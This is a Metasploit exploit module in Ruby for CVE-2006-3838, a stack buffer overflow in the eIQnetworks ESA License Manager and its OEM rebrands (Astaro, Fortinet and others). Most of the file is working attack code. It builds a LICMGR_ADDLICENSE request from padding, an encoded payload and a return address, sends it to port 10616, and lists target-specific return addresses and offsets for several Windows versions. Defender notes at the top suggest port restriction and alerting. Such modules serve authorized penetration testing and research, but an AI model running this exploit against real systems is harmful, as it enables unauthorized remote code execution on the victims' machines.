
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/misc/eiqnetworks_esa.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit module for CVE-2006-3838: a stack buffer overflow in the
# eIQnetworks Enterprise Security Analyzer (ESA) License Manager, triggered
# while it processes a long argument to the LICMGR_ADDLICENSE command.
#
# Notes for defenders reading this module:
# * The service is reached over TCP; the module defaults to port 10616.
#   Limiting that port to management hosts reduces reachability.
# * The request is the plain-text command "LICMGR_ADDLICENSE&" followed by
#   one argument of several hundred bytes or more and a closing "&". A
#   LICMGR_ADDLICENSE argument of that size is a reasonable thing to alert
#   on; legitimate license data is presumably much shorter (confirm against
#   the product before tuning a rule).
# * The target list names OEM rebrands of the same License Manager (Astaro,
#   Fortinet, iPolicy, SanMina, Secure Computing, Top Layer), so exposure
#   should be assessed for those products as well as for ESA itself.
# * Fixed versions are not stated here; see the advisories under 'References'.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata (references, payload constraints, targets)
  # and the default remote port.
  #
  # @param info [Hash] metadata passed in by the framework, merged through
  #   update_info with the values below
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in eIQnetworks
          Enterprise Security Analyzer. During the processing of
          long arguments to the LICMGR_ADDLICENSE command, a stack-based
          buffer overflow occurs. This module has only been tested
          against ESA v2.1.13.
        },
        'Author' => [ 'MC', 'ri0t <ri0t[at]ri0tnet.net>', 'kf' ],
        'References' => [
          ['CVE', '2006-3838'],
          ['OSVDB', '27526'],
          ['BID', '19163'],
          ['ZDI', '06-024'],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'seh',
        },
        'Payload' => {
          'Space' => 400,
          # A NUL byte is the only byte excluded from the encoded payload.
          'BadChars' => "\x00",
          # Short x86 stub placed ahead of the encoder; it lowers ESP
          # (add esp, -0x1001 / inc esp), presumably so the decoder's stack
          # use does not overwrite the payload -- TODO confirm intent.
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
        },
        'Platform' => 'win',
        # Every target pairs a fixed return address ('Ret') with the number
        # of bytes that precede it in the argument ('Offset'): 494 for the
        # eIQ-branded builds, 1262 for the OEM builds.
        'Targets' => [
          ['EnterpriseSecurityAnalyzerv21 Universal', { 'Ret' => 0x00448187, 'Offset' => 494 } ],

          ['EiQ Enterprise Security Analyzer Offset 494 Windows 2000 SP0-SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 494 } ], # call ebx
          ['EiQ Enterprise Security Analyzer Offset 494 Windows XP English SP1/SP2', { 'Ret' => 0x77db64dc, 'Offset' => 494 } ], # jmp ebx
          ['EiQ Enterprise Security Analyzer Offset 494 Windows Server 2003 SP0/SP1', { 'Ret' => 0x77d16764, 'Offset' => 494 } ], # jmp EBX

          ['Astaro Report Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 1262 } ],
          ['Astaro Report Manager (OEM) Offset 1262 Windows XP English SP1/SP2', { 'Ret' => 0x77db64dc, 'Offset' => 1262 } ],
          ['Astaro Report Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' => 0x77d16764, 'Offset' => 1262 } ],

          ['Fortinet FortiReporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 1262 } ],
          ['Fortinet FortiReporter (OEM) Offset 1262 Windows XP English SP1/SP2', { 'Ret' => 0x77db64dc, 'Offset' => 1262 } ],
          ['Fortinet FortiReporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' => 0x77d16764, 'Offset' => 1262 } ],

          ['iPolicy Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 1262 } ],
          ['iPolicy Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2', { 'Ret' => 0x77db64dc, 'Offset' => 1262 } ],
          ['iPolicy Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' => 0x77d16764, 'Offset' => 1262 } ],

          ['SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 1262 } ],
          ['SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows XP English SP1/SP2', { 'Ret' => 0x77db64dc, 'Offset' => 1262 } ],
          ['SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' => 0x77d16764, 'Offset' => 1262 } ],

          ['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 1262 } ],
          ['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2', { 'Ret' => 0x77db64dc, 'Offset' => 1262 } ],
          ['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' => 0x77d16764, 'Offset' => 1262 } ],

          ['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows 2000 SP0-SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 1262 } ],
          ['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows XP English SP1/SP2', { 'Ret' => 0x77db64dc, 'Offset' => 1262 } ],
          ['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' => 0x77d16764, 'Offset' => 1262 } ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2006-07-24'
      )
    )

    # Default TCP port for the License Manager; operators can override RPORT.
    register_options([Opt::RPORT(10616)])
  end

  # Sends one LICMGR_ADDLICENSE request built for the selected target, then
  # hands control to the payload handler and closes the connection.
  #
  # Request layout, in order: the command and "&" separator, padding, the
  # encoded payload, the target's return address as a 32-bit little-endian
  # value, and a trailing "&". Padding plus payload together span exactly
  # target['Offset'] bytes.
  def exploit
    connect

    print_status("Trying target #{target.name}...")

    encoded_payload = payload.encoded
    # One random English character, repeated to fill the remaining space.
    pad_length = target['Offset'] - encoded_payload.length
    padding = rand_text_english(1) * pad_length
    return_address = [target.ret].pack('V')

    request = "LICMGR_ADDLICENSE&" + padding + encoded_payload + return_address + "&"
    sock.put(request)

    handler
    disconnect
  end
end